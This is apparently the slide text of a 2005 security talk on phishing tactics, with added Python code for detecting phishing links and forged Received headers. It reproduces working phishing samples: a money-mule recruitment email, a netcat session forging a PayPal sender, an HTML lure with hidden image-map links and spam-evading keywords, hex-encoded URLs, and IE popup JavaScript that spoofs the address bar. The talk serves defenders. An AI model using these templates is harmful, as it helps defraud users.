
A Primer on Phishing Tactics

Practical Counter-Fraud Solutions


Introduction

About Me:

Tod Beardsley, [email protected]
Lead Counter-Fraud Engineer at TippingPoint, a division of 3com

About Phishing:

• Massive growth over the last 18 months.

• ChoicePoint and LexisNexis hacks are great targets, but 0wning your mom’s bridge friends is a lot easier.

• Very effective at convincing said mom’s friends.


The Lure


The Catch


The Catch continued


Profit!

• So now what? Enter the money mules:

Dear Future Employee,

We have received your contact information from employment agency. My name is Karl Jorgensen, project coordinator and your direct supervisor at Odono Inc. Please read the information below about our company and your job description.

Odono Inc. leader in wholesale produce distribution is looking for responsible individuals to be responsible for the areas of shipping operations, customer service, transaction and bank operations.

Current openings: Transaction Manager

You will receive transfers for our company, send/receive funds. You should have your local bank branch locating near you, so you can withdraw money from your account within several hours. You should have home, work or cell phone number (preferably), so we can contact you immediately.

Requirements:
* Be able to check your email several times a day
* Be able to respond to emails immediately
* Be able to work overtime if needed
* Be responsible and hard working

If you are interested in this position and meet the minimum requirements please visit and register here:

http://www.odono.org/jobs.html


E-Mail Trust Building Tactics

• Between two and five percent of phishing e-mail is responded to.

• Several thousand e-mail addresses are used in a given campaign.

• Compare to spam: a typical, successful run of millions of addresses generates a click-through rate of about 0.01%.

• Phishing click-throughs are qualified – once hooked, the victims almost always provide information to the attacker.


E-mail: Forging From Fields

• Very complicated task… well, not really.

C:\>nc mail.cox-internet.com 25
220 jupiter ESMTP server (InterMail vK.4.04.00.03 201-232-140-20030416 license fe37ca4dbd17753103b2892ad5fc6c09) ready Sat, 4 Jun 2005 02:18:24 -0500
HELO paypal.com
250 fe4.cox-internet.com
MAIL From: [email protected]
Sender <[email protected]> Ok
RCPT To: [email protected]
Recipient <[email protected]> Ok
DATA
354 Ok Send data ending with <CRLF>.<CRLF>

Dear Valued Customer,

Due to a problem with our servers, you need to give us your password right away. Please click here:

http://www.paypalk.com

Thank you for your continued patronage.
.
250 Message received: [email protected]
fe4.cox-internet.com ESMTP server closing connection

C:\>


E-mail: Forging Received Fields

A normal Received path:

Received: (qmail 48182 invoked from network); 18 May 2005 15:46:48 -0000
Received: from outbound2.den.paypal.com (216.113.188.112) by mail.example.com with SMTP; 18 May 2005 15:46:48 -0000
Received: from denweb159.den.paypal.com (denweb159.den.paypal.com [10.191.12.207])
    by outbound2.den.paypal.com (Postfix) with SMTP id A9CAC11802C
    for <[email protected]>; Wed, 18 May 2005 08:46:47 -0700 (PDT)
Received: (qmail 6332 invoked by uid 99); 18 May 2005 15:46:47 -0000

A Slightly Altered Received path:

Received: (qmail 68233 invoked from network); 2 Jun 2005 09:36:47 -0000
Received: from s01060010dcf9b811.vc.shawcable.net (24.81.25.151) by mail.example.com with SMTP; 2 Jun 2005 09:36:47 -0000
Received: from paypal.com (smtp1.sc5.paypal.com [64.4.244.74])
    by S01060010dcf9b811.vc.shawcable.net with esmtp id ABEFBBB123
    for <[email protected]>; Thu, 02 Jun 2005 09:36:35 -0700
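To make the difference between the two paths mechanical, here is an added Python example (not from the talk) that trusts only the Received: line stamped by our own MX and reports any lower hop whose claimed origin sits in a different domain than the host that actually connected. The chains are the slide's two paths retyped with a made-up recipient address, and mail.example.com is assumed to be our MX.

```python
import re

# Constructed from the two Received: paths on the slide: header values in
# message order (most recently added first); the recipient address is made up.
NORMAL_CHAIN = [
    "(qmail 48182 invoked from network); 18 May 2005 15:46:48 -0000",
    "from outbound2.den.paypal.com (216.113.188.112) by mail.example.com with SMTP; 18 May 2005 15:46:48 -0000",
    "from denweb159.den.paypal.com (denweb159.den.paypal.com [10.191.12.207]) by outbound2.den.paypal.com (Postfix) with SMTP id A9CAC11802C for <recipient@example.com>; Wed, 18 May 2005 08:46:47 -0700 (PDT)",
    "(qmail 6332 invoked by uid 99); 18 May 2005 15:46:47 -0000",
]
ALTERED_CHAIN = [
    "(qmail 68233 invoked from network); 2 Jun 2005 09:36:47 -0000",
    "from s01060010dcf9b811.vc.shawcable.net (24.81.25.151) by mail.example.com with SMTP; 2 Jun 2005 09:36:47 -0000",
    "from paypal.com (smtp1.sc5.paypal.com [64.4.244.74]) by S01060010dcf9b811.vc.shawcable.net with esmtp id ABEFBBB123 for <recipient@example.com>; Thu, 02 Jun 2005 09:36:35 -0700",
]

# The 'from <host> ... by <host>' clause of a relaying hop.
HOP_RE = re.compile(r"\bfrom\s+([\w.-]+).*?\bby\s+([\w.-]+)", re.I | re.S)

def registrable(host):
    """Last two labels of a hostname: a rough stand-in for the registrable
    domain that is good enough for the .com/.net names on the slide."""
    return ".".join(host.lower().rstrip(".").split(".")[-2:])

def check_received(chain, our_mx):
    """Return (true_origin, suspicious_claims) for a Received: chain.

    Only the line our own MX stamped is trustworthy: its 'from' host is the
    peer that really connected. Everything below it arrived inside the message
    and can say whatever the sender likes, so any lower hop claiming an origin
    in a different registrable domain is reported."""
    hops = [(m.group(1), m.group(2)) for v in chain if (m := HOP_RE.search(v))]
    for i, (frm, by) in enumerate(hops):
        if by.lower() == our_mx.lower():
            untrusted = [f for f, _ in hops[i + 1:]]
            flagged = [f for f in untrusted if registrable(f) != registrable(frm)]
            return frm, flagged
    return None, []  # our MX never appears: this chain is not ours to judge

if __name__ == "__main__":
    for name, chain in (("normal", NORMAL_CHAIN), ("altered", ALTERED_CHAIN)):
        origin, flagged = check_received(chain, "mail.example.com")
        print(f"{name}: connected from {origin}; forged-looking claims: {flagged}")
```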


E-mail: Evading Anti-Spam

• Looks like a regular message…


E-mail: Evading Anti-Spam

• But it’s really an inline GIF. Trickiness.

This is a multi-part message in MIME format.
--------------060608080401000901030005
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit

<html>
<p><font face="Arial"><A HREF="https://www.southtrust.com/st/PersonalBanking/custdetailsconfirmation"><map name="rtaiz"><area coords="0, 0, 597, 355" shape="rect" href="http://comannd.com:280"></map><img SRC="cid:part1.07060107.05040003@[email protected]" border="0" usemap="#rtaiz"></A></a></font></p>
<p><font color="#FFFFF0">Tennis Warner Bross Alyssa Milano XFL Cheerleaders Metallica </font></p>
</html>

--------------060608080401000901030005
Content-Type: image/gif; name="bergman.GIF"
Content-Transfer-Encoding: base64
Content-ID: <part1.07060107.05040003@[email protected]>
Content-Disposition: inline; filename="bergman.GIF"

R0lGODlhYgJrAfOFAAUIAKbK8ICAgABgwACAwCCAwECAwECgwGCgwICgwIDAwP/78AAA/////wAAAAAAACH5BAQAAAAALAAAAABVAmMBAAT/sMlJq7046827/2AojmRpnmiqrmzrvnAsz3Rt33iu73zv/8CgcEgsGo/IpHLJbDqf0Kh0Sq1ar9isdsvter+dhXhMLpvFgYACQQC73/C4/BpAFAiDvH7P7/fngIGCg4QxAQV+[…]


E-Mail: Misdirection and Redirection

• Crafted “Automatically generated” links

<A HREF="http://222.82.252.206/SouthTrust/">https://www.suntrust.com/update/</A>

• Hex-Encoded URLs

http://%32%31%30.%32%31%39%2e%32%34%31%2e%31%32%35/%69%6d%61%67%65%73/paypal/cgi-bin/webscrcmd_login.php

http://210.219.241.125/images/paypal/cgi-bin/webscrcmd_login.php

• Overlapping Area Map Tags

<A HREF="https://www.southtrust.com/st/PersonalBanking/custdetailsconfirmation"><map name="rtaiz"><area coords="0, 0, 597, 355" shape="rect" href="http://comannd.com:280"></map>

• Open Redirection Services


E-Mail: Misdirection and Redirection continued

• Obfuscation Services


E-Mail: Cutting Out the Web Site Entirely


Detecting Phishy Links

Best and most Draconian:

• No HTML-rendered e-mail, ever.

More realistic:

• No hex-encoded printable ASCII characters in domain names.

• No HTTP link containing “http” more than once.

• No nested <A> and <AREA> links.

• Correlate obfuscation techniques to From addresses.

Is there some reason anti-spam can’t handle this already?
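The three “more realistic” rules above, applied to the lure HTML from the earlier slides as an added Python example that is not part of the talk; the sample anchors are constructed from the slide snippets, and the rule labels are my own shorthand.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed samples built from the lure HTML on the earlier slides.
SAMPLES = {
    "crafted": '<A HREF="http://222.82.252.206/SouthTrust/">https://www.suntrust.com/update/</A>',
    "hex": '<a href="http://%32%31%30.%32%31%39%2e%32%34%31%2e%31%32%35/%69%6d%61%67%65%73/paypal/cgi-bin/webscrcmd_login.php">Log in</a>',
    "areamap": ('<A HREF="https://www.southtrust.com/st/PersonalBanking/custdetailsconfirmation">'
                '<map name="rtaiz"><area coords="0, 0, 597, 355" shape="rect" href="http://comannd.com:280"></map>'
                '<img SRC="cid:bergman" border="0" usemap="#rtaiz"></A>'),
    "clean": '<a href="https://www.example.com/help">Help Center</a>',
}

ANCHOR_RE = re.compile(r'<a\b[^>]*\bhref="([^"]*)"[^>]*>(.*?)</a>', re.I | re.S)
PCT_RE = re.compile(r"%([0-9A-Fa-f]{2})")

def decode_url(url):
    """Show a percent-encoded URL the way the browser will resolve it."""
    return unquote(url)

def anchor_issues(html):
    """Apply the three 'more realistic' rules to every <a> in html and return
    the set of rule labels that fire."""
    issues = set()
    for href, inner in ANCHOR_RE.findall(html):
        host = urlsplit(href).hostname or ""
        # Rule 1: percent-encoded printable ASCII inside the host name.
        if any(0x20 <= int(h, 16) < 0x7F for h in PCT_RE.findall(host)):
            issues.add("hex-encoded-host")
        # Rule 2: "http" appears more than once across the href and the link text.
        if (href + inner).lower().count("http") > 1:
            issues.add("double-http")
        # Rule 3: an <area> link nested inside the <a>.
        if re.search(r"<area\b", inner, re.I):
            issues.add("nested-area")
    return issues

if __name__ == "__main__":
    for name, html in SAMPLES.items():
        print(f"{name:8} {sorted(anchor_issues(html)) or 'ok'}")
    print(decode_url(ANCHOR_RE.search(SAMPLES["hex"]).group(1)))
```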


Web Site Trust Building

• Once you’re on the page, you’re pretty much compelled to execute.

• Pages today are much more cookie-cutter than their e-mail lures.

• Sometimes pages don’t match up with the bank. How significant is this?

• The pages themselves may suck, but the exploits being used to control the web servers… well they kind of suck too.


The Magic of Copy and Paste

• Yes, quite magical. File | Save As | Upload | Done.

• Typically the only elements that need touching are the image locations, some of the JavaScript source files, and the <FORM> action, which is redirected to the phisher’s PHP form mailer.

• Many leave traces of their copying:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<!-- saved from url=(0036)http://secure.netbank.com/login.htm -->
<HTML><HEAD><TITLE>NetBank Account Login</TITLE>


window.createPopup

var vuln_x, vuln_y, vuln_w, vuln_h;

// Work out where the browser's Location Bar sits on screen.
function vuln_calc() {
    var root = document[(document.compatMode == 'CSS1Compat') ? 'documentElement' : 'body'];
    vuln_x = window.screenLeft + 72;
    vuln_y = window.screenTop - 20;
    vuln_w = root.offsetWidth - 520;
    vuln_h = 17;
    vuln_show();
}

var vuln_win;

// IE-only window.createPopup(): a chromeless window that can be drawn over the browser's own UI.
function vuln_pop() {
    vuln_win = window.createPopup();
    vuln_win.document.body.innerHTML = vuln_html;
    vuln_win.document.body.style.margin = 0;
    vuln_win.document.body.onunload = vuln_pop;
    vuln_show();
}

function vuln_show() {
    if (vuln_win) vuln_win.show(vuln_x, vuln_y, vuln_w, vuln_h);
}

var vuln_html = '<div style="height: 100%; line-height: 17px; font-family: \'Tahoma\', sans-serif; font-size: 8pt;">https://www.usbank.com/secure/-run</div>';


window.createPopup continued


window.createPopup continued

Presto Change-o

But why bother?

• Many sites incorporate this code, probably just due to cookie-cutter practices.

• The victims of phishing don’t usually qualify the sites they visit off the Location Bar anyway, or anything else in the browser.


Signed, Sealed… Who Cares?

Thank you, Verisign!

A more obvious and much easier to forge security seal.


Verisign Spoofery Continued


Conclusions

• It is silly to think that users will take care of themselves. A decade of wildly successful spam campaigns proves this. (75% of all Internet e-mail is junk mail today.)

• The only reason why people notice phishing is because traditional anti-spam has failed to catch it – partly because the keywords are already in everyone’s “known good” set, and because people whitelist e-mail from their banks.

• The overmarketing and near total lack of understanding of SSL is also partly to blame. Browsers are terrible at preventing this out of the box, and this is one thing they ought to be good at.

• A billion dollars a year of capital flight kind of sucks, and it’s probably more.

• Not all phishers are ID10Ts. Some use very advanced techniques, write effective malware, and deploy very complex networks of SMTP and HTTP relays to conduct their business.

Thank you! [email protected]